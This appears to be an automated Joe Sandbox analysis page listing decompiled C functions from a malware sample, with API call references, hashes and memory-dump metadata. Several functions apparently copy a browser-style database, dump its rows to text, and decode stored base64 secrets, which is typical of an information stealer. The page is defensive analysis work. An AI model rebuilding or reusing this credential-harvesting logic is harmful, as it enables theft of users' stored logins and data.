Instruction Fuzzy Hash: 7C2128B2900119EFCB109FA5DD849EE7BBDEF08384F048476F906F2250E7349B549BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404BBC Relevance: 6.0, APIs: 4, Instructions: 42
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BBC(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
				int _v8;
				BYTE* _t8;
				int _t9;

				 *__ebx = 0;
				_v8 = 0;
				 *__edi = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
					_t8 = LocalAlloc(0x40,  *__edi);
					 *__ebx = _t8;
					if(_t8 != 0) {
						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
						_v8 = _t9;
						if(_t9 == 0) {
							 *__ebx = LocalFree( *__ebx);
						}
					}
				}
				return _v8;
			}

0x00404bcd
0x00404bcf
0x00404bd2
0x00404bdc
0x00404be2
0x00404be8
0x00404bec
0x00404bf8
0x00404bfe
0x00404c03
0x00404c0d
0x00404c0d
0x00404c03
0x00404bec
0x00404c14

APIs

CryptStringToBinaryA.CRYPT32(004035C3,00000000,00000001,00000000,?,00000000,00000000), ref: 00404BD4
LocalAlloc.KERNEL32(00000040,?,?,?,004035C3,?), ref: 00404BE2
CryptStringToBinaryA.CRYPT32(004035C3,00000000,00000001,00000000,?,00000000,00000000), ref: 00404BF8
LocalFree.KERNEL32(?,?,?,004035C3,?), ref: 00404C07

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 766b40d49825bf03a9a5a7421196c1e174f54d7a45b9fa17c643d4b0ddc0bf15
Instruction ID: 0bf2b68146c603208688ed92703fad92ef40ca2c2e6830fd64368cc1009dfca7
Opcode Fuzzy Hash: 766b40d49825bf03a9a5a7421196c1e174f54d7a45b9fa17c643d4b0ddc0bf15
Instruction Fuzzy Hash: 70F03CF0102234BBDF315F22CD4CECB7FB9EF4ABA0B005056F505A6294D3B14A40DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406C80 Relevance: 34.8, APIs: 23, Instructions: 309
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00406C80(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, char _a40) {
				void _v8;
				char _v12;
				char _v16;
				char _v28;
				CHAR* _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t115;
				void* _t154;
				long _t172;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t201;
				void* _t203;
				void* _t205;
				void* _t235;
				char* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				void* _t259;
				char* _t265;
				char* _t292;
				char* _t293;
				void* _t294;
				void* _t295;
				void* _t297;
				void* _t298;

				_t299 = __eflags;
				_t239 = __ecx;
				E0040EA50( &_v40, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B( &_v40, _t239,  &_v124, __eflags,  *0x6133e4), _t239,  &_v40);
				E004016EF(_v124);
				_t115 = E0040D800(0x40fbe1,  &_v112, _t299, 0x1a);
				_pop(_t240);
				E0040EAEF(E0040EB29( &_v40, _t240, _t115,  &_v124, _t299), _t240,  &_v40);
				E004016EF(_v124);
				E004016EF(_v112);
				CopyFileA(_a4, _v40, 1);
				E0040EA50( &_v28, _t299, 0x40fbe1);
				E0040EAEF(E0040EB6B( &_v28, _t240,  &_v124, _t299,  *0x6131c4), _t240,  &_v28);
				E004016EF(_v124);
				E0040EAEF(E0040EB6B( &_v28, _t240,  &_v124, _t299, 0x40fbe4), _t240,  &_v28);
				E004016EF(_v124);
				E0040EAEF(E0040EB29( &_v28, _t240,  &_a28,  &_v124, _t299), _t240,  &_v28);
				E004016EF(_v124);
				E0040EAEF(E0040EB6B( &_v28, _t240,  &_v124, _t299, "_"), _t240,  &_v28);
				E004016EF(_v124);
				E0040EAEF(E0040EB6B(E0040EB29( &_v28, _t240,  &_a16,  &_v112, _t299), _t240,  &_v124, _t299,  *0x613248), _t240,  &_v28);
				E004016EF(_v124);
				E004016EF(_v112);
				_t154 =  *0x6135c0(_a4,  &_v16);
				if(_t154 == 0) {
					_t172 =  *0x61357c(_v16,  *0x613148, 0xffffffff,  &_v12, _t154);
					_t295 = _t294 + 0x14;
					if(_t172 == 0) {
						_t176 = RtlAllocateHeap(GetProcessHeap(), _t172, 0x5f5e0ff);
						_v8 = _t176;
						_t177 =  *0x613598(_v12);
						_pop(_t245);
						_t302 = _t177 - 0x64;
						if(_t177 == 0x64) {
							_t238 = "0";
							_t265 = "\t";
							do {
								E0040EA50( &_v124, _t302,  *0x6135b4(_v12, 0));
								E0040EA50( &_v64, _t302,  *0x6135b4(_v12, 1));
								E0040EA50( &_v112, _t302,  *0x6135b4(_v12, 2));
								E0040EA50( &_v52, _t302,  *0x6135b4(_v12, 3));
								E0040EA50( &_v100, _t302,  *0x6135b4(_v12, 4));
								E0040EA50( &_v88, _t302,  *0x6135b4(_v12, 5));
								_t201 =  *0x6135b4(_v12, 6);
								_pop(_t259);
								E0040EA50( &_v76, _t302, _t201);
								_t203 =  *0x613784(_v64, _t238);
								_t292 =  &_v64;
								if(_t203 != 0) {
									_push( *0x613048);
								} else {
									_push( *0x613334);
								}
								E0040EAAB(_t259, _t292);
								_t205 =  *0x613784(_v52);
								_t293 =  &_v52;
								if(_t205 != 0) {
									_push( *0x613048);
								} else {
									_push( *0x613334);
								}
								E0040EAAB(_t259, _t293);
								 *0x61375c(_v8, _v124);
								 *0x61375c(_v8, _t265);
								 *0x61375c(_v8, _v64);
								 *0x61375c(_v8, _t265);
								 *0x61375c(_v8, _v112);
								 *0x61375c(_v8, _t265);
								 *0x61375c(_v8, _v52);
								 *0x61375c(_v8, _t265);
								 *0x61375c(_v8, _v100);
								 *0x61375c(_v8, _t265);
								 *0x61375c(_v8, _v88);
								 *0x61375c(_v8, _t265);
								 *0x61375c(_v8, _v76);
								 *0x61375c(_v8, "\n");
								E004016EF(_v76);
								E004016EF(_v88);
								E004016EF(_v100);
								E004016EF(_v52);
								E004016EF(_v112);
								E004016EF(_v64);
								E004016EF(_v124);
								_t235 =  *0x613598(_v12);
								_pop(_t245);
							} while (_t235 == 0x64);
						}
						_t178 =  *0x61367c(_v8);
						_t306 = _t178 - 5;
						if(_t178 > 5) {
							_push( *0x61367c(_v8));
							_push(_v8);
							_t297 = _t295 - 0xc;
							E0040EA82( &_v28, _t245, _t297, _t306);
							_t298 = _t297 - 0x50;
							E00401581( &_a40, _t298);
							_push( &_v124);
							E00403721(_t245, _t306);
							_t295 = _t298 + 0x68;
							E004016EF(_v124);
						}
						memset( &_v8, 0, 4);
					}
					 *0x61359c(_v12);
					 *0x6135c4(_v16);
				}
				DeleteFileA(_v40);
				E004016EF(_v40);
				E004016EF(_v28);
				E004016EF(0);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a40);
			}

0x00406c80
0x00406c80
0x00406c92
0x00406cab
0x00406cb3
0x00406cbd
0x00406cc4
0x00406cd3
0x00406cdb
0x00406ce3
0x00406cf0
0x00406cfa
0x00406d13
0x00406d1b
0x00406d33
0x00406d3b
0x00406d51
0x00406d59
0x00406d71
0x00406d79
0x00406d9d
0x00406da5
0x00406dad
0x00406db9
0x00406dc3
0x00406dd9
0x00406ddf
0x00406de4
0x00406df7
0x00406e00
0x00406e03
0x00406e09
0x00406e0a
0x00406e0d
0x00406e13
0x00406e18
0x00406e1d
0x00406e2e
0x00406e44
0x00406e5a
0x00406e70
0x00406e86
0x00406e9c
0x00406ea6
0x00406ead
0x00406eb2
0x00406ebb
0x00406ec1
0x00406ec6
0x00406ed0
0x00406ec8
0x00406ec8
0x00406ec8
0x00406ed6
0x00406edf
0x00406ee5
0x00406eea
0x00406ef4
0x00406eec
0x00406eec
0x00406eec
0x00406efa
0x00406f05
0x00406f0f
0x00406f1b
0x00406f25
0x00406f31
0x00406f3b
0x00406f47
0x00406f51
0x00406f5d
0x00406f67
0x00406f73
0x00406f7d
0x00406f89
0x00406f97
0x00406fa0
0x00406fa8
0x00406fb0
0x00406fb8
0x00406fc0
0x00406fc8
0x00406fd0
0x00406fd8
0x00406fde
0x00406fdf
0x00406e1d
0x00406feb
0x00406ff1
0x00406ff4
0x00406fff
0x00407000
0x00407006
0x0040700b
0x00407010
0x00407018
0x00407020
0x00407021
0x00407029
0x0040702c
0x0040702c
0x00407039
0x0040703f
0x00407045
0x0040704e
0x00407055
0x00407059
0x00407062
0x0040706a
0x00407071
0x00407078
0x00407080
0x00407088
0x00407090
0x004070a1

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040D800: GetSystemTime.KERNEL32(?,0040FBE1,00000000,?,?,?,?,?,?,?,004031B4,00000014), ref: 0040D825

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

CopyFileA.KERNEL32(?,?,00000001), ref: 00406CF0
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00406DF0
RtlAllocateHeap.NTDLL(00000000), ref: 00406DF7
StrCmpCA.SHLWAPI(?,00412128,00000000), ref: 00406EBB
StrCmpCA.SHLWAPI(?,00412128), ref: 00406EDF
lstrcat.KERNEL32(0040771F,?), ref: 00406F05
lstrcat.KERNEL32(0040771F,0041212C), ref: 00406F0F
lstrcat.KERNEL32(0040771F,?), ref: 00406F1B
lstrcat.KERNEL32(0040771F,0041212C), ref: 00406F25
lstrcat.KERNEL32(0040771F,?), ref: 00406F31
lstrcat.KERNEL32(0040771F,0041212C), ref: 00406F3B
lstrcat.KERNEL32(0040771F,?), ref: 00406F47
lstrcat.KERNEL32(0040771F,0041212C), ref: 00406F51
lstrcat.KERNEL32(0040771F,?), ref: 00406F5D
lstrcat.KERNEL32(0040771F,0041212C), ref: 00406F67
lstrcat.KERNEL32(0040771F,?), ref: 00406F73
lstrcat.KERNEL32(0040771F,0041212C), ref: 00406F7D
lstrcat.KERNEL32(0040771F,?), ref: 00406F89
lstrcat.KERNEL32(0040771F,00412120), ref: 00406F97
lstrlen.KERNEL32(0040771F), ref: 00406FEB
lstrlen.KERNEL32(0040771F), ref: 00406FF9
memset.MSVCRT ref: 00407039
DeleteFileA.KERNEL32(?,?), ref: 00407059

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: f15e00c58fd03c2ddf34ad32015abdc2926d5f580fe03829c4b94c1a6b70859e
Instruction ID: 3b53d811e411325b4a76a41242f755ac73c744df125888ba16a0d55fc928e25b
Opcode Fuzzy Hash: f15e00c58fd03c2ddf34ad32015abdc2926d5f580fe03829c4b94c1a6b70859e
Instruction Fuzzy Hash: 7EC10572900119EFCF01ABA1DD4A9CDBB76EF04304F24856AF602B71B1DB366E659F48

Uniqueness

Uniqueness Score: -1.00%

Function 0040687D Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 291
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040687D(void* __ebx, void* __edi, void* __esi, char _a4, char _a16, char _a28) {
				char* _v8;
				char* _v12;
				CHAR* _v24;
				void* _v28;
				char _v40;
				char _v52;
				long _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				intOrPtr _t86;
				long _t108;
				void* _t111;
				char* _t113;
				char* _t116;
				char* _t164;
				char* _t167;
				void* _t173;
				char* _t186;
				char* _t189;
				void* _t195;
				char* _t213;
				intOrPtr* _t220;
				void* _t223;
				signed int _t224;
				void* _t226;
				void* _t233;
				void* _t241;

				_t233 = __esi;
				_t226 = __edi;
				_push(_a28);
				if( *0x6135b0() == 0) {
					_t86 =  *0x613584; // 0x0
					_t224 = 0;
					_t220 = 0x613584;
					if(_t86 == 0) {
						L4:
						_push(_t233);
						_push(_t226);
						E0040EA50( &_v24, _t278, 0x40fbe1);
						E0040EAEF(E0040EB29( &_v24, _t220,  &_a28,  &_v40, _t278), _t220,  &_v24);
						E004016EF(_v40);
						E0040EAEF(E0040EB6B( &_v24, _t220,  &_v40, _t278, 0x40fbe4), _t220,  &_v24);
						E004016EF(_v40);
						E0040EAEF(E0040EB6B( &_v24, _t220,  &_v52, _t278,  *0x613550), _t220,  &_v24);
						E004016EF(_v52);
						_t241 = CreateFileA(_v24, 0x80000000, 1, 0, 3, 0, 0);
						_v28 = _t241;
						if(_t241 != 0) {
							SetFilePointer(_t241, 0, 0, 2);
							_t108 = GetFileSize(_t241, 0);
							_t229 = _t108;
							SetFilePointer(_t241, 0, 0, 0);
							_t20 = _t229 + 1; // 0x1
							_t111 = malloc(_t20);
							_t222 =  &_v56;
							_v12 = _t111;
							ReadFile(_t241, _t111, _t108,  &_v56, 0);
							_t113 = StrStrA(_v12,  *0x613108);
							_v8 = _t113;
							_t280 = _t113;
							if(_t113 != 0) {
								do {
									_v8 =  &(_v8[0x10]);
									_t116 = StrStrA(_v8,  *0x6132b0) - 3;
									_v12 = _t116;
									 *_t116 = 0;
									E0040EAEF(E0040EB6B(0x6139e0,  &_v56,  &_v52, _t280,  *0x6132c8),  &_v56, 0x6139e0);
									E004016EF(_v52);
									E0040EAEF(E0040EB29(0x6139e0, _t222,  &_a16,  &_v40, _t280), _t222, 0x6139e0);
									E004016EF(_v40);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v116, _t280, "\n"), _t222, 0x6139e0);
									E004016EF(_v116);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v92, _t280,  *0x61307c), _t222, 0x6139e0);
									E004016EF(_v92);
									E0040EAEF(E0040EB29(0x6139e0, _t222,  &_a4,  &_v164, _t280), _t222, 0x6139e0);
									E004016EF(_v164);
									_t232 = "\n";
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v68, _t280, "\n"), _t222, 0x6139e0);
									E004016EF(_v68);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v212, _t280,  *0x6130b4), _t222, 0x6139e0);
									E004016EF(_v212);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v140, _t280, _v8), _t222, 0x6139e0);
									E004016EF(_v140);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v188, _t280, "\n"), _t222, 0x6139e0);
									E004016EF(_v188);
									_t164 = StrStrA( &(_v12[1]),  *0x613404);
									_v8 =  &(_t164[0x14]);
									_t167 = StrStrA( &(_t164[0x14]),  *0x613400) - 3;
									_v12 = _t167;
									 *_t167 = 0;
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v80, _t280,  *0x613044), _t222, 0x6139e0);
									E004016EF(_v80);
									_t173 = E00406790(_v8);
									_pop(_t223);
									E0040EAEF(E0040EB6B(0x6139e0, _t223,  &_v104, _t280, _t173), _t223, 0x6139e0);
									E004016EF(_v104);
									E0040EAEF(E0040EB6B(0x6139e0, _t223,  &_v128, _t280, "\n"), _t223, 0x6139e0);
									E004016EF(_v128);
									_t186 = StrStrA( &(_v12[1]),  *0x613400);
									_v8 =  &(_t186[0x14]);
									_t189 = StrStrA( &(_t186[0x14]),  *0x6134dc) - 3;
									_v12 = _t189;
									 *_t189 = 0;
									E0040EAEF(E0040EB6B(0x6139e0, _t223,  &_v152, _t280,  *0x6131f0), _t223, 0x6139e0);
									E004016EF(_v152);
									_t195 = E00406790(_v8);
									_pop(_t222);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v176, _t280, _t195), _t222, 0x6139e0);
									E004016EF(_v176);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v200, _t280, "\n"), _t222, 0x6139e0);
									E004016EF(_v200);
									E0040EAEF(E0040EB6B(0x6139e0, _t222,  &_v224, _t280, _t232), _t222, 0x6139e0);
									E004016EF(_v224);
									_t213 = StrStrA( &(_v12[1]),  *0x613108);
									_v8 = _t213;
								} while (_t213 != 0);
								_t241 = _v28;
							}
							CloseHandle(_t241);
						}
						 *0x6135c8();
						E004016EF(_v24);
					} else {
						do {
							_t220 = _t220 + 1;
							_t224 = _t224 * 0xa + _t86 - 0x30;
							_t86 =  *_t220;
						} while (_t86 != 0);
						_t278 = _t224 - 0x20;
						if(_t224 < 0x20) {
							goto L4;
						}
					}
				}
				E004016EF(_a4);
				E004016EF(_a16);
				return E004016EF(_a28);
			}

0x0040687d
0x0040687d
0x00406886
0x00406892
0x00406898
0x004068a0
0x004068a2
0x004068a9
0x004068c5
0x004068c5
0x004068c6
0x004068cf
0x004068e5
0x004068ed
0x00406905
0x0040690d
0x00406926
0x0040692e
0x00406948
0x0040694a
0x0040694f
0x0040695a
0x00406962
0x0040696c
0x0040696e
0x00406974
0x00406978
0x00406980
0x00406987
0x0040698a
0x00406999
0x0040699f
0x004069a2
0x004069a4
0x004069af
0x004069b5
0x004069c8
0x004069cb
0x004069ce
0x004069dd
0x004069e5
0x004069f9
0x00406a01
0x00406a17
0x00406a1f
0x00406a36
0x00406a3e
0x00406a55
0x00406a60
0x00406a65
0x00406a77
0x00406a7f
0x00406a99
0x00406aa4
0x00406abb
0x00406ac6
0x00406adb
0x00406ae6
0x00406af6
0x00406b06
0x00406b15
0x00406b18
0x00406b1b
0x00406b2a
0x00406b32
0x00406b3a
0x00406b3f
0x00406b4d
0x00406b55
0x00406b67
0x00406b6f
0x00406b7f
0x00406b8f
0x00406b9e
0x00406ba1
0x00406ba4
0x00406bb6
0x00406bc1
0x00406bc9
0x00406bce
0x00406bdf
0x00406bea
0x00406bff
0x00406c0a
0x00406c1f
0x00406c2a
0x00406c3a
0x00406c40
0x00406c43
0x00406c4b
0x00406c4b
0x00406c4f
0x00406c4f
0x00406c55
0x00406c5e
0x004068ab
0x004068ab
0x004068b1
0x004068b2
0x004068b6
0x004068b8
0x004068bc
0x004068bf
0x00000000
0x00000000
0x004068bf
0x00406c65
0x00406c69
0x00406c71
0x00406c7f

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0040FBE4,0040FBE1,?,?,?), ref: 00406942
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 0040695A
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 00406962
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0040696E
malloc.MSVCRT ref: 00406978
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0040698A
StrStrA.SHLWAPI(?), ref: 00406999
StrStrA.SHLWAPI(00000010), ref: 004069BC
StrStrA.SHLWAPI(?,00412120,00000010,00412120,00412120), ref: 00406AF6
StrStrA.SHLWAPI(-00000014), ref: 00406B09
StrStrA.SHLWAPI(?,00412120,00000000), ref: 00406B7F
StrStrA.SHLWAPI(-00000014), ref: 00406B92

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 00406790: memset.MSVCRT ref: 004067B7
Part of subcall function 00406790: lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 004067D2
Part of subcall function 00406790: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004067DC
Part of subcall function 00406790: memcpy.MSVCRT ref: 00406840

StrStrA.SHLWAPI(?,00412120,00412120,00000000), ref: 00406C3A
CloseHandle.KERNEL32(00000000), ref: 00406C4F

Strings

9a, xrefs: 004069AA

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: File$Pointerlstrcpylstrlen$BinaryCloseCreateCryptHandleReadSizeStringlstrcatmallocmemcpymemset
String ID: 9a
API String ID: 2881474955-3489679592
Opcode ID: e69a1496581056d43fc9151070517c1ec788d8e80d27be2bd6125990262bba4f
Instruction ID: 70dba1d3f7d9965a781f904056e5040d070f55c9a4722ecb7adee440edd374ba
Opcode Fuzzy Hash: e69a1496581056d43fc9151070517c1ec788d8e80d27be2bd6125990262bba4f
Instruction Fuzzy Hash: 07B11E31A00114ABCF10FFB6DC819CD77B6AF04308F1559BAF502B73A2DA39AE558B58

Uniqueness

Uniqueness Score: -1.00%

Function 00409107 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,0040C9FD), ref: 0040911C
ExitProcess.KERNEL32 ref: 00409127
strtok_s.MSVCRT ref: 00409138

Strings

block, xrefs: 00409110

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: cd869ed501d3a13dcf8ea6508cd480bb61e6113a7ca21b12d4287d5cf0dbb530
Instruction ID: ebdac0e3b1247d567a27655cc678059fe43126f2579f2f79a672a1bbc7116530
Opcode Fuzzy Hash: cd869ed501d3a13dcf8ea6508cd480bb61e6113a7ca21b12d4287d5cf0dbb530
Instruction Fuzzy Hash: 74314FB0604200BBDB149F61ED48B977B7CEB49705F1458BEE806F62D2E378CA459A19

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF7A Relevance: 18.2, APIs: 12, Instructions: 165
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040AF7A(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v40;
				void _v308;
				void _v572;
				char _v1572;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t66;
				void* _t80;
				void* _t94;
				void* _t96;
				void* _t98;
				char* _t99;
				char* _t101;
				intOrPtr* _t108;
				void* _t125;
				void* _t132;
				void* _t156;
				void* _t157;
				void* _t160;
				void* _t161;
				void* _t165;
				void* _t167;
				void* _t168;

				_t168 = __eflags;
				memset( &_v572, 0, 0x104);
				memset( &_v308, 0, 0x104);
				_v12 = 0;
				_v16 = 0;
				_t66 = E0040D93A( &_v40, 0x1a);
				_pop(_t125);
				 *0x61375c( &_v572,  *_t66);
				E004016EF(_v40);
				 *0x61375c( &_v572,  *0x613258);
				 *0x61375c( &_v308,  &_v572);
				 *0x61375c( *0x6134f4);
				_t160 = _t157 + 0x18 - 0xc;
				E0040EA50(_t160, _t168,  &_v308);
				_t80 = E0040D910( &_v308);
				_t161 = _t160 + 0xc;
				_t169 = _t80;
				if(_t80 != 0) {
					_t94 = E00404CAA(_t169,  &_v308,  &_v12,  &_v16);
					_t161 = _t161 + 0xc;
					_t170 = _t94;
					if(_t94 != 0) {
						_t165 = _t161 - 0xc;
						E0040EA50(_t165, _t170, _a4);
						_t96 = E00404B20( &_v24,  &_v28);
						_t161 = _t165 + 0xc;
						if(_t96 != 0) {
							_t98 = E0040DCF4(_v28,  &_v24, _t125, _v24);
							_pop(_t132);
							_t156 = _t98;
							_t99 = StrStrA(_t156,  *0x613040);
							_v8 = _t99;
							if(_t99 != 0) {
								_t101 =  &(_t99[0xc]);
								_v8 = _t101;
								_t101[0x8c] = 0;
								if(E00404BBC( &_v20, _t132,  &_v24, _v8) != 0) {
									_v28 =  &_v1572;
									memset(_v28, 0, 0x3e8 << 0);
									_t108 = E00404DEB(_v24,  &_v40, _v20, _v12, _v16);
									_t167 = _t161 + 0x1c;
									 *0x61375c( &_v1572,  *_t108);
									E004016EF(_v40);
									_push(0x40fbe1);
									_push( &_v1572);
									if( *0x613784() != 0) {
										_push( &_v1572);
									} else {
										_push(_v8);
									}
									 *0x61375c(_a8);
									 *0x61375c(_a8, "\n");
									_v20 =  &_v1572;
									memset(_v20, 0, 0x3e8 << 0);
									_t161 = _t167 + 0xc;
								}
							}
							GlobalFree(_t156);
						}
					}
				}
				E00404C15( &_v16,  &_v12);
				_v20 =  &_v572;
				memset(_v20, 0, 0x104 << 0);
				_v20 =  &_v308;
				memset(_v20, 0, 0x104 << 0);
				_v20 =  &_v8;
				return memset(_v20, 0, 4 << 0);
			}

0x0040af7a
0x0040af9c
0x0040afaa
0x0040afb4
0x0040afb7
0x0040afba
0x0040afbf
0x0040afc9
0x0040afd2
0x0040afe4
0x0040aff8
0x0040b00b
0x0040b011
0x0040b01d
0x0040b022
0x0040b027
0x0040b02a
0x0040b02c
0x0040b041
0x0040b046
0x0040b049
0x0040b04b
0x0040b051
0x0040b059
0x0040b064
0x0040b069
0x0040b06e
0x0040b07a
0x0040b07f
0x0040b086
0x0040b089
0x0040b08f
0x0040b094
0x0040b09a
0x0040b09d
0x0040b0a0
0x0040b0b8
0x0040b0c4
0x0040b0d1
0x0040b0e3
0x0040b0e8
0x0040b0f4
0x0040b0fd
0x0040b102
0x0040b10d
0x0040b116
0x0040b123
0x0040b118
0x0040b118
0x0040b118
0x0040b127
0x0040b135
0x0040b141
0x0040b14e
0x0040b14e
0x0040b14e
0x0040b0b8
0x0040b151
0x0040b151
0x0040b06e
0x0040b04b
0x0040b15d
0x0040b168
0x0040b175
0x0040b17d
0x0040b18a
0x0040b18f
0x0040b1a2

APIs

memset.MSVCRT ref: 0040AF9C
memset.MSVCRT ref: 0040AFAA

